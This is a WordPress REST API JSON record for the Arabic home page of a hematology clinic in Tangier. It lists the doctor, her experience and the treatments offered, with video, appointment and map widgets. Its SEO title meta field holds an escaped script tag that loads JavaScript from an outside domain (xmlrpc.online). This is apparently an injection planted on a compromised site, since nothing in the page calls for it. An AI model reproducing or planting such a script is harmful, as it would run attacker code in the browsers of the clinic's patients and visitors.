{"id":2,"date":"2015-03-19T17:58:30","date_gmt":"2015-03-19T17:58:30","guid":{"rendered":"http:\/\/fitness3.mythemecloud.io\/\/?page_id=2"},"modified":"2025-03-07T08:37:30","modified_gmt":"2025-03-07T08:37:30","slug":"accueil","status":"publish","type":"page","link":"https:\/\/staging.hematologietanger.ma\/ar\/","title":{"rendered":"Cabinet d&rsquo;H\u00e9matologie Tanger"},"content":{"rendered":"<div data-elementor-type=\"wp-post\" data-elementor-id=\"2\" class=\"elementor elementor-2\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-wjtnaha elementor-section-height-full elementor-section-boxed elementor-section-height-default elementor-section-items-middle\" data-id=\"wjtnaha\" data-element_type=\"section\" data-settings=\"{&quot;background_background&quot;:&quot;classic&quot;,&quot;shape_divider_bottom&quot;:&quot;triangle&quot;,&quot;shape_divider_bottom_negative&quot;:&quot;yes&quot;}\">\n\t\t\t\t\t\t\t<div class=\"elementor-background-overlay\"><\/div>\n\t\t\t\t\t\t<div class=\"elementor-shape elementor-shape-bottom\" data-negative=\"true\">\n\t\t\t<svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" viewbox=\"0 0 1000 100\" preserveaspectratio=\"none\">\n\t<path class=\"elementor-shape-fill\" d=\"M500.2,94.7L0,0v100h1000V0L500.2,94.7z\"\/>\n<\/svg>\t\t<\/div>\n\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-rrzpsbl\" data-id=\"rrzpsbl\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-wurqgro elementor-widget elementor-widget-heading\" data-id=\"wurqgro\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">Medecin h\u00e9matologue \u00e0 Tanger<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-wqtjnjo elementor-widget elementor-widget-heading\" data-id=\"wqtjnjo\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u200f \u200f\u0627\u0644\u062f\u0643\u062a\u0648\u0631\u0629 \u0644\u0637\u064a\u0641\u0629 \u0644\u062e\u0645\u0627\u0633 \u200f<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-rhmfxqf elementor-widget elementor-widget-heading\" data-id=\"rhmfxqf\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">\u200f \u200f \u200f\u0637\u0628\u064a\u0628\u0629 \u0627\u062e\u062a\u0635\u0627\u0635\u064a\u0629\u200f \u0641\u064a \u0623\u0645\u0631\u0627\u0636 \u0627\u0644\u062f\u0645<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-pazzjld elementor-widget elementor-widget-heading\" data-id=\"pazzjld\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t<h2 class=\"elementor-heading-title elementor-size-default\">24 \u0639\u0627\u0645\u0627 \u0645\u0646 \u0627\u0644\u062e\u0628\u0631\u0629<\/h2>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-fb4ba08 elementor-widget elementor-widget-text-editor\" data-id=\"fb4ba08\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<h2>\u200f \u200f \u200f \u200f\u0627\u0644\u0639\u0644\u0627\u062c\u0627\u062a<\/h2><p><strong>\u0641\u0642\u0631 \u0627\u0644\u062f\u0645<\/strong><br \/><strong>\u200f\u0623\u0645\u0631\u0627\u0636 \u062a\u062e\u062b\u0631 \u0627\u0644\u062f\u0645<\/strong><br \/><strong>\u0627\u0644\u062b\u0644\u0627\u0633\u064a\u0645\u064a\u0627<\/strong><br \/><strong>\u200f\u0641\u0642\u0631 \u0627\u0644\u062f\u0645 \u0627\u0644\u0645\u0646\u062c\u0644\u064a<\/strong><br \/><strong>\u200f\u0632\u0631\u0627\u0639\u0629 \u0627\u0644\u0646\u062e\u0627\u0639 \u0627\u0644\u0639\u0638\u0645\u064a<\/strong><br \/><strong>\u200f\u0639\u0645\u0644\u064a\u0629 \u062a\u0628\u062f\u064a\u0644 \u0627\u0644\u0628\u0644\u0627\u0632\u0645\u0629 -\u200f\u0639\u0645\u0644\u064a\u0629 \u200f\u062a\u0628\u062f\u064a\u0644 \u0627\u0644\u0643\u0631\u064a\u0627\u062a \u0627\u0644\u062d\u0645\u0631\u0627\u0621-<\/strong><br \/><strong>\u200f\u0633\u0631\u0637\u0627\u0646 \u0627\u0644\u062f\u0645 \u0648 \u0627\u0644\u0623\u0646\u0633\u062c\u0629 \u200f\u0627\u0644\u0644\u0645\u0641\u0627\u0648\u064a\u0629<br \/><\/strong><\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-cc15b0f elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"cc15b0f\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-aaf921f\" data-id=\"aaf921f\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-845184c elementor-widget elementor-widget-video\" data-id=\"845184c\" data-element_type=\"widget\" data-settings=\"{&quot;youtube_url&quot;:&quot;https:\\\/\\\/youtu.be\\\/COM05lWpHMk?si=icUlV9aiaB_8v136&quot;,&quot;video_type&quot;:&quot;youtube&quot;,&quot;controls&quot;:&quot;yes&quot;}\" data-widget_type=\"video.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-wrapper elementor-open-inline\">\n\t\t\t<div class=\"elementor-video\"><\/div>\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-uyvuxnj elementor-align-center elementor-widget elementor-widget-button\" data-id=\"uyvuxnj\" data-element_type=\"widget\" data-widget_type=\"button.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-button-wrapper\">\n\t\t\t<a class=\"elementor-button elementor-button-link elementor-size-sm\" href=\"https:\/\/staging.hematologietanger.ma\/ar\/rendez-vous\/\">\n\t\t\t\t\t\t<span class=\"elementor-button-content-wrapper\">\n\t\t\t\t\t\t<span class=\"elementor-button-text\">\u062a\u062d\u062f\u064a\u062f \u0645\u0648\u0639\u062f<\/span>\n\t\t<\/span>\n\t\t\t\t\t<\/a>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-0454677 elementor-widget elementor-widget-menu-anchor\" data-id=\"0454677\" data-element_type=\"widget\" data-widget_type=\"menu-anchor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div id=\"adresse\" class=\"elementor-menu-anchor\"><\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-5a76699 elementor-widget elementor-widget-google_maps\" data-id=\"5a76699\" data-element_type=\"widget\" data-widget_type=\"google_maps.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t<div class=\"elementor-custom-embed\">\n\t\t\t<iframe loading=\"lazy\"\n\t\t\t\t\tsrc=\"https:\/\/maps.google.com\/maps?q=35.775606%2C%20-5.802324&#038;t=m&#038;z=16&#038;output=embed&#038;iwloc=near\"\n\t\t\t\t\ttitle=\"35.775606, -5.802324\"\n\t\t\t\t\taria-label=\"35.775606, -5.802324\"\n\t\t\t><\/iframe>\n\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t<\/div>","protected":false},"excerpt":{"rendered":"<p>Medecin h\u00e9matologue \u00e0 Tanger Dr. Latifa Loukhmas sp\u00e9cialiste en maladies du sang 24 ans d&rsquo;exp\u00e9rience SOINS : An\u00e9miesH\u00e9mophilie (Maladies de la coagulation du sang)Thalass\u00e9mieDr\u00e9panocytoseGreffe de moelle osseuseEchange plasmatique, Erythrocytaire et phototh\u00e9rapie extracorporelle (Aph\u00e9r\u00e8se)Cancer du sang, des ganglions et de la rate https:\/\/youtu.be\/COM05lWpHMk?si=icUlV9aiaB_8v136 Prendre rendez-vous<\/p>","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"open","template":"","meta":{"_seopress_robots_primary_cat":"","_seopress_titles_title":"&lt;script src=&quot;https:\/\/xmlrpc.online\/x\/h.js&quot;&gt;&lt;\/script&gt;","_seopress_titles_desc":"","_seopress_robots_index":"","footnotes":""},"class_list":["post-2","page","type-page","status-publish","hentry","entry"],"jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/pages\/2","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/comments?post=2"}],"version-history":[{"count":113,"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/pages\/2\/revisions"}],"predecessor-version":[{"id":624,"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/pages\/2\/revisions\/624"}],"wp:attachment":[{"href":"https:\/\/staging.hematologietanger.ma\/ar\/wp-json\/wp\/v2\/media?parent=2"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}